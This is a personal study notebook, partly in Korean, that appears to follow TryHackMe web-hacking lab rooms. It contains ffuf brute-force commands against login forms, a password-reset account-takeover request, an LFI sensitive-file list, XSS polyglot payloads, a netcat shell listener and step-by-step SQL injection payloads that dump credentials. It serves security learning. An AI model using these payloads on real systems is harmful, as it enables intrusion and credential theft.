노트필기) Web Fundamentals
Content Discovery
1) robots.txt
2)favicon
this can give us a clue on what framework is in use.
curl https://static-labs.tryhackme.cloud/sites/favicon/images/favicon.ico | md5sum
https://wiki.owasp.org/index.php/OWASP_favicon_database
3) Sitemap.xml
4) HTTP Headers
curl http://10.10.49.162 -v
5) Manual Discovery
6) OSINT - Google Hacking/Dorking
Filter | Example | Description |
site | site:tryhackme.com | returns results only from the specified website address |
inurl | inurl:admin | returns results that have the specified word in the URL |
filetype | filetype:pdf | returns results which are a particular file extension |
intitle | intitle:admin | returns results that contain the specified word in the title |
https://en.wikipedia.org/wiki/Google_hacking
7) OSINT - Wappalyzer
Wappalyzer (https://www.wappalyzer.com/) is an online tool and browser extension that helps identify what technologies a website uses, such as frameworks, Content Management Systems (CMS), payment processors and much more, and it can even find version numbers as well.
8) OSINT - Wayback Machine
The Wayback Machine (https://archive.org/web/) is a historical archive of websites that dates back to the late 90s. You can search a domain name, and it will show you all the times the service scraped the web page and saved the contents. This service can help uncover old pages that may still be active on the current website.
9) OSINT - Github
10) S3 Buckets
S3 BucketsS3 Buckets are a storage service provided by Amazon AWS, allowing people to save files and even static website content in the cloud accessible over HTTP and HTTPS.'
The format of the S3 buckets is http(s)://{name}.s3.amazonaws.com where {name} is decided by the owner, such as tryhackme-assets.s3.amazonaws.com.
11) Automated Discovery
https://github.com/danielmiessler/SecLists
-Using ffuf
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.49.162/FUZZ
-Using dirb
dirb http://10.10.49.162/ /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
-gobuster
gobuster dir --url http://10.10.49.162/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
Subdomain Enumeration
SSL/TLS Certificates
When an SSL/TLS (Secure Sockets Layer/Transport Layer Security) certificate is created for a domain by a CA (Certificate Authority), CA's take part in what's called "Certificate Transparency (CT) logs". These are publicly accessible logs of every SSL/TLS certificate created for a domain name. The purpose of Certificate Transparency logs is to stop malicious and accidentally made certificates from being used. We can use this service to our advantage to discover subdomains belonging to a domain, sites like https://crt.sh and https://ui.ctsearch.entrust.com/ui/ctsearchui offer a searchable database of certificates that shows current and historical results.
OSINT - Search Engine
Go to Google and use the search term -site:www.tryhackme.com site:*.tryhackme.com, which should reveal a subdomain for tryhackme.com; use that subdomain to answer the question below.
DNS Bruteforce
dnsrecon -t brt -d acmeitsupport.thm
OSINT - Sublist3r
Automation Using Sublist3r
To speed up the process of OSINT subdomain discovery, we can automate the above methods with the help of tools like Sublist3r
./sublist3r.py -d acmeitsupport.thm
Virtual host
user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.239.36
The above command uses the -w switch to specify the wordlist we are going to use. The -H switch adds/edits a header (in this instance, the Host header), we have the FUZZ keyword in the space where a subdomain would normally go, and this is where we will try all the options from the wordlist.
결과 보고 -fs 옵션 넣어서 특정 크기는 날리면 됨
user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.239.36 -fs 2395
Authentication Bypass
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.184.90/customers/signup -mr "username already exists"
위에서 나온 아이디 목록으로 valid_usernames.txt 생성
password bruteforce
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.184.90/customers/login -fc 200
Logical Flaw
curl 'http://10.10.184.90/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'
Cooke Tampering
해쉬 결과 검색
IDOR
Insecure Direct Object Reference
Encoded IDs
Location | Description |
/etc/issue | contains a message or system identification to be printed before the login prompt. |
/etc/profile | controls system-wide default variables, such as Export variables, File creation mask (umask), Terminal types, Mail messages to indicate when new mail has arrived |
/proc/version | specifies the version of the Linux kernel |
/etc/passwd | has all registered user that has access to a system |
/etc/shadow | contains information about the system's users' passwords |
/root/.bash_history | contains the history commands for root user |
/var/log/dmessage | contains global system messages, including the messages that are logged during system startup |
/var/mail/root | all emails for root user |
/root/.ssh/id_rsa | Private SSH keys for a root or any known valid user on the server |
/var/log/apache2/access.log | the accessed requests for Apache webserver |
C:\boot.ini | contains the boot options for computers with BIOS firmware |
Local File Inclusion (LFI)
uisng nullbyteÏ
%00
입력창에서 안되면 주소창으로도 해볼 것
Remote File Inclusion - RFI
document.cookie = "user=John"; // 이름이 'user'인 쿠키의 값만 갱신함
alert(document.cookie); // 모든 쿠키 보여주기
SSRF stands for Server-Side Request Forgery
Append &x= at the end to ignore the rest of the URL.
requestbin.com
can be used to catch HTTP requests from a server
Defeating Common SSRF Defenses
in a cloud environment, it would be beneficial to block access to the IP address 169.254.169.254, which contains metadata for the deployed cloud server, including possibly sensitive information.
Intro to Cross-site Scripting
examples)
- XSS found in Shopify
- $7,500 for XSS found in Steam chat
- $2,500 for XSS in HackerOne
- XSS found in Infogram
How to test for Reflected XSS:
You'll need to test every possible point of entry; these include:
- Parameters in the URL Query String
- URL File Path
- Sometimes HTTP Headers (although unlikely exploitable in practice)
A popular tool for Blind XSS attacks is XSS Hunter Express. Although it's possible to make your own tool in JavaScript, this tool will automatically capture cookies, URLs, page contents and more.
<>가 필더될 경우
/images/cat.jpg" onload="alert('THM');
polyglots
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
넷캣으로 리스닝 서버
nc -l -p 9001
==
nc -n -l -v -p 9001
Remediation
Method | Description |
Blind | This type of injection is where there is no direct output from the application when testing payloads. You will have to investigate the behaviours of the application to determine whether or not your payload was successful. |
Verbose | This type of injection is where there is direct feedback from the application once you have tested a payload. For example, running the whoami command to see what user the application is running under. The web application will output the username on the page directly. |
Useful payloads
I have compiled some valuable payloads for both Linux & Windows into the tables below.
Linux
Payload | Description |
whoami | See what user the application is running under. |
ls | List the contents of the current directory. You may be able to find files such as configuration files, environment files (tokens and application keys), and many more valuable things. |
ping | This command will invoke the application to hang. This will be useful in testing an application for blind command injection. |
sleep | This is another useful payload in testing an application for blind command injection, where the machine does not have ping installed. |
nc | Netcat can be used to spawn a reverse shell onto the vulnerable application. You can use this foothold to navigate around the target machine for other services, files, or potential means of escalating privileges. |
Windows
Payload | Description |
whoami | See what user the application is running under. |
dir | List the contents of the current directory. You may be able to find files such as configuration files, environment files (tokens and application keys), and many more valuable things. |
ping | This command will invoke the application to hang. This will be useful in testing an application for blind command injection. |
timeout | This command will also invoke the application to hang. It is also useful for testing an application for blind command injection if the ping command is not installed. |
payload cheet sheet
https://github.com/payloadbox/command-injection-payload-list
SQL
select * from users;
select username,password from users;
select * from users LIMIT 1;
select * from users where username='admin';
select * from users where username != 'admin';
select * from users where username='admin' or username='jon';
select * from users where username='admin' and password='p4ssword';
// wildcard : %
select * from users where username like 'a%';
select * from users where username like '%n';
select * from users where username like '%mi%';
SELECT name,address,city,postcode from customers UNION SELECT company,address,city,postcode from suppliers;
insert into users (username,password) values ('bob','password123');
update users SET username='root',password='pass123' where username='admin';
delete from users where username='martin';
delete from users;
SQL Injection
In-Band SQLi
Try typing an apostrophe ( ' ) after the id=1 and press enter. And you'll see this returns an SQL error informing you of an error in your syntax.
1 UNION SELECT 1
1 UNION SELECT 1,2
1 UNION SELECT 1,2,3
0 UNION SELECT 1,2,3
0 UNION SELECT 1,2,database()
0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'
0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'
0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users
Blind
Blind SQLi - Authentication Bypass
select * from users where username='%username%' and password='%password%' LIMIT 1;
select * from users where username='' and password='' OR 1=1;
Boolean Based
select * from users where username = '%username%' LIMIT 1;
admin123' UNION SELECT 1;--
admin123' UNION SELECT 1,2,3;--
admin123' UNION SELECT 1,2,3 where database() like '%';--
admin123' UNION SELECT 1,2,3 where database() like 's%';--
admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'a%';--
admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name='users';--
admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%';
admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%' and COLUMN_NAME !='id';
admin123' UNION SELECT 1,2,3 from users where username like 'a%
admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%
Time based
referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';--
Out-of-Band SQLi